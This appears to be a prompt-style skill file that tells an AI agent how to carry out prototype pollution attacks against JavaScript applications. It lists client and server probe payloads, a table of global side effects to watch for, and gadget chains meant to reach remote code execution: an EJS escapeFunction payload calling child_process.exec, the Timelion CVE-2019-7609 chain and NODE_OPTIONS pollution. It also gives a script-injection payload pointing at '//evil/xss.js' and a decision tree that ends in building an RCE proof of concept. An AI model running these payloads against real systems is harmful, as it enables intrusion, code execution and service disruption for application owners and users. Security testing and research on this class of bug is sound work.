SKILL: Prototype Pollution — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert prototype pollution for client and server JS. Covers
__proto__vsconstructor.prototype, merge-sink detection, Express/qs-style black-box probes, and gadget chains (EJS, Timelion-class patterns, child_process/NODE_OPTIONS). Assumes you know object spread and prototype inheritance — focus is on parser behavior and post-pollution sinks.
Routing note: prioritize PP when you see deep merges, recursive assign, JSON.parse followed by Object.assign, or URL queries converted to nested objects.
0. QUICK START
Client-side first probes
#__proto__[polluted]=1
#__proto__[polluted]=polluted
#constructor[prototype][polluted]=1
When input can reflect into DOM or framework routing, pair with alert(1) / console checks to observe whether global object properties were polluted.
#__proto__[xxx]=alert(1)
Server-side first probes(JSON / form)
{"__proto__":{"polluted":true}}
{"constructor":{"prototype":{"polluted":true}}}
After sending, check whether unrelated follow-up responses show abnormal headers/status/JSON spacing, or whether app logic reads Object.prototype.polluted (see §3 detection table).
Quick boolean
If target code uses lodash.merge, deep-extend, hoek.applyToDefaults, or some qs/query-string configurations, raise priority.
1. MECHANISM
Prototype chain: when accessing obj.key, if obj lacks own property key, lookup walks up [[Prototype]] until Object.prototype.
__proto__: many parsers treat literal key __proto__ as a magic path that attaches child properties to the prototype. Merging { "__proto__": { "x": 1 } } can be equivalent to Object.prototype.x = 1 depending on implementation and patch level.
constructor.prototype: constructor typically points to the object's constructor function; constructor.prototype is that constructor's prototype object. For plain objects this usually links to Object.prototype. Example path:
{"constructor":{"prototype":{"polluted":1}}}
This is not always equivalent to __proto__ (filtering, JSON parsing, Bun/Node differences), so test both paths.
Core issue: this is not just "one extra parameter"; in non-isolated merge logic, attacker-controlled keys point to prototype objects, giving global or shared template context malicious properties that later code reads normally, triggering gadgets.
2. CLIENT-SIDE DETECTION
URL fragment
https://app.example/page#__proto__[admin]=1
https://app.example/#__proto__[xxx]=alert(1)
If router or analytics code parses fragments into objects and then merges, pollution may occur.
constructor.prototype path
#constructor[prototype][role]=admin
DOM / attribute injection ideas
If the framework merges attribute names as object keys:
__proto__[src]=//evil/xss.js
Event-handler style keys (implementation-dependent):
__proto__[onerror]=alert(1)
Verification: open a fresh page without fragment and check in console whether test keys remain on Object.prototype; account for extension and DevTools interference.
3. SERVER-SIDE DETECTION (Express / Node, black-box)
The payloads below assume body/query is deeply parsed into objects by qs or similar parsers (possibly with body-parser). Observe global side effects, not only current endpoint return values.
| Payload (JSON example) | Expected observable signal |
|---|---|
{"__proto__":{"parameterLimit":1}} | Multi-parameter parsing in follow-up requests is ignored or abnormal (qs-style parameterLimit) |
{"__proto__":{"ignoreQueryPrefix":true}} | Double-question-mark prefixes like ??foo=bar are accepted or behavior changes sharply |
{"__proto__":{"allowDots":true}} | Nested keys like ?foo.bar=baz are expanded via dot notation |
{"__proto__":{"json spaces":" "}} | JSON-serialized responses gain extra spaces (JSON.stringify spacing setting polluted) |
{"__proto__":{"exposedHeaders":["foo"]}} | CORS responses include foo-related headers (if framework reads config from prototype) |
{"__proto__":{"status":510}} | Some response status changes to 510 or another abnormal code (app reads status from object) |
Operational tip: send pollution request first, then a clean request to observe persistence; connection pools and worker lifecycle affect whether impact is globally visible.
4. EXPLOITATION GADGETS
| Target / scenario | Payload or pattern | Notes |
|---|---|---|
| EJS | {"__proto__":{"client":1,"escapeFunction":"JSON.stringify; process.mainModule.require('child_process').exec('COMMAND')"}} | If template engine options like escapeFunction are read from polluted prototype, this may lead to RCE; strongly version/config dependent |
| Timelion expression chain (CVE-2019-7609) | .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("COMMAND")') | Historical chain: prototype pollution + timeline expression execution; useful to understand expression + PP combinations |
Node child_process | Pollute shell, argv0, env, NODE_OPTIONS, etc. (merged into exec/fork option objects) | Depends on whether later code calls spawn/fork and reads options from prototype chain |
| Generic constructor path | {"constructor":{"prototype":{"foo":"bar"}}} | Bypasses weak validation that filters only the __proto__ key |
Chain mindset: pollution -> dependency reads obj.settings.xxx without hasOwnProperty -> RCE / SSRF / path traversal.
5. TOOLS
| Project | Purpose |
|---|---|
| yeswehack/pp-finder | Helps locate PP-prone merge points and patterns |
| yuske/silent-spring | Research and detection around prototype-pollution surfaces |
| yuske/server-side-prototype-pollution | Server-side PP testing suite/methodology |
| BlackFan/client-side-prototype-pollution | Browser-side PP cases and payloads |
| portswigger/server-side-prototype-pollution | Burp ecosystem extension / supporting material |
| msrkp/PPScan | Scanning/verification helper |
Prioritize use on authorized targets; automated tools can cause side effects on stateful applications.
6. DECISION TREE
Input merged into nested object?
(query, JSON, GraphQL vars, YAML→JSON)
|
NO --------------+-------------- YES
| |
Other vuln class Parser allows __proto__ /
constructor.prototype keys?
|
NO --------------+-------------- YES
| |
Check unicode / Confirm global effect:
bypass of key names clean follow-up request
| |
+--------------+----------------+
|
v
Gadget present? (template, spawn, JSON.stringify opts, CORS)
|
NO ------------------+------------------ YES
| |
Report PP as DoS / Build minimal RCE or
logic impact high-impact PoC
| |
+---------------------+-------------------+
|
v
Client-side: fragment / DOM / third-party script
Server-side: qs/body-parser/lodash/deep-merge version audit
Related routing
- Input routing and multi-injection parallel entry -> Injection Testing Router.
- Template execution chains (non-PP) -> SSTI.
- Insecure deserialization (non-JS prototype) -> Deserialization.